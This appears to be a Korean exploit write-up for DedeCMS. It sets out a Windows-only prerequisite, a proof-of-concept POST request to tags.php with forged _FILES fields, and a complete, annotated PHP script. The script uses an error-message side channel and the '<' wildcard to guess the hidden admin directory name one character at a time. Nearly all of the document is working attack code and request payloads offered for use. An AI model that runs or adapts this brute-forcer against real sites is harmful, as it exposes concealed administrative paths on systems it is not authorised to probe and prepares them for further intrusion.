전제 조건
Windows 시스템만 해당 (페이로드의 `<` 문자가 Windows 파일 경로 조회에서 와일드카드로 처리되는 점에 의존하므로 Linux 대상에서는 동작하지 않음)
POC
POST http://localhost/dedecms/tags.php
Body: dopost=save&_FILESb4dboytmp_name=./de</images/admin_top_logo.gif&_FILESb4dboyname=0&_FILESb4dboysize=0&_FILESb4dboytype=image/gif
(응답에 'Upload filetype not allow !' 문자열이 없으면 `./de`로 시작하는 디렉터리가 존재한다는 뜻이며, 아래 EXP는 이 차이를 오라클로 삼아 한 글자씩 경로를 추측한다.)
EXP
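<?php

declare(strict_types=1);

/*
 * DedeCMS path-disclosure brute forcer (the EXP for the POC above).
 *
 * Every probe POSTs crafted `_FILES…` fields whose tmp_name is
 * "./<guess></images/admin_top_logo.gif". When the guessed prefix does not
 * exist the target answers with 'Upload filetype not allow !'; when it does,
 * that string is absent. That difference is the side channel used here.
 * The `<` is what lets a partial guess match — presumably because Windows
 * path lookups treat it as a wildcard; the page itself only states that the
 * technique is Windows-only.
 *
 * NOTE(review): the field names (`_FILESb4dboytmp_name`, …) look like
 * array-style names whose `[`/`]` were lost during extraction
 * (i.e. `_FILES[b4dboy][tmp_name]`); confirm against the original advisory.
 * NOTE(review): $domain is used both as the base for the probe request and
 * as the prefix of the verification URL; which directory the probe actually
 * walks (the target script's working directory) is not shown on this page.
 *
 * Fixes relative to the original listing:
 *  - the cURL options set CURLOPT_SSL_VERIFYHOST twice (a typo for
 *    CURLOPT_SSL_VERIFYPEER), so peer verification was never disabled;
 *  - a failed transfer (curl_exec() === false) counted as an oracle hit,
 *    because strpos() on a non-string cannot find the marker;
 *  - both search loops spun forever when no character matched;
 *  - `@file_get_contents` error suppression replaced by an HTTP status check;
 *  - a doubled slash in the built URLs ("…/dedecms//index.php") removed.
 */

$domain = 'http://localhost/dedecms/';
// Strip the trailing slash once so every URL built below has exactly one.
$base = rtrim($domain, '/');
$url = $base . '/index.php';

/** Response marker emitted when the guessed path prefix does not exist. */
const REJECT_MARKER = 'Upload filetype not allow !';

/** Give up after this many characters so a broken oracle cannot loop forever. */
const MAX_PATH_LENGTH = 64;

/**
 * POST $data to $url and return the raw response (status line, headers, body).
 *
 * @param string $url    Target URL.
 * @param string $data   URL-encoded request body.
 * @param string $cookie Optional value for the Cookie header.
 *
 * @throws RuntimeException when the transfer itself fails, so a network
 *         error is never mistaken for "marker absent" by the caller.
 */
function post(string $url, string $data, string $cookie = ''): string
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER => true,
        CURLOPT_POST => true,
        // Lab target; TLS verification is deliberately off. The original
        // listing set VERIFYHOST twice, which left VERIFYPEER enabled.
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_COOKIE => $cookie,
        CURLOPT_POSTFIELDS => $data,
        // Without a timeout a hung connection stalls the whole search.
        CURLOPT_TIMEOUT => 30,
    ]);
    $result = curl_exec($ch);
    $error = curl_error($ch);
    curl_close($ch);

    if (!is_string($result)) {
        throw new RuntimeException("request to $url failed: $error");
    }

    return $result;
}

/**
 * Ask the oracle whether "./$prefix" is the start of an existing directory.
 *
 * @param string $url    Probe endpoint (index.php of the target).
 * @param string $prefix Path prefix guessed so far.
 *
 * @return bool true when the reject marker is absent from the response.
 */
function prefix_exists(string $url, string $prefix): bool
{
    $body = "dopost=save&_FILESb4dboytmp_name=./{$prefix}</images/admin_top_logo.gif"
        . '&_FILESb4dboyname=0&_FILESb4dboysize=0&_FILESb4dboytype=image/gif';

    return strpos(post($url, $body), REJECT_MARKER) === false;
}

/**
 * True when a GET of $url yields HTTP 200 (the recovered directory serves
 * the logo). Replaces the original `@file_get_contents` truthiness check.
 *
 * @param string $url Absolute URL to fetch.
 */
function url_ok(string $url): bool
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_TIMEOUT => 30,
    ]);
    $fetched = curl_exec($ch) !== false;
    $status = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    return $fetched && $status === 200;
}

// Characters tried at each position: a-z then 0-9 (ints stringify on concat).
$alphabet = array_merge(range('a', 'z'), range(0, 9));

// Stage 1: the original listing searched the first two characters as a pair;
// that choice is kept as-is. One full pass either finds a pair or fails.
$path = null;
foreach ($alphabet as $first) {
    foreach ($alphabet as $second) {
        $guess = $first . $second;
        if (prefix_exists($url, $guess)) {
            $path = $guess;
            break 2;
        }
    }
}
if ($path === null) {
    echo 'no two-character prefix matched; target not vulnerable or the oracle string changed' . PHP_EOL;
    exit(1);
}
echo $path . PHP_EOL;

// Stage 2: extend one character at a time until the leaked directory serves
// the logo. A pass with no match means the oracle stopped answering usefully,
// which the original code turned into an endless loop.
while (strlen($path) < MAX_PATH_LENGTH) {
    $extended = false;
    foreach ($alphabet as $next) {
        if (!prefix_exists($url, $path . $next)) {
            continue;
        }
        $path .= $next;
        $extended = true;
        echo $path . PHP_EOL;
        if (url_ok($base . '/' . $path . '/images/admin_top_logo.gif')) {
            echo $base . '/' . $path . '/' . PHP_EOL;
            exit(0);
        }
        break; // rescan the alphabet from the extended prefix
    }
    if (!$extended) {
        echo "no further character matched after '$path'; stopping" . PHP_EOL;
        exit(1);
    }
}

echo 'gave up after ' . MAX_PATH_LENGTH . " characters (last prefix: $path)" . PHP_EOL;
exit(1);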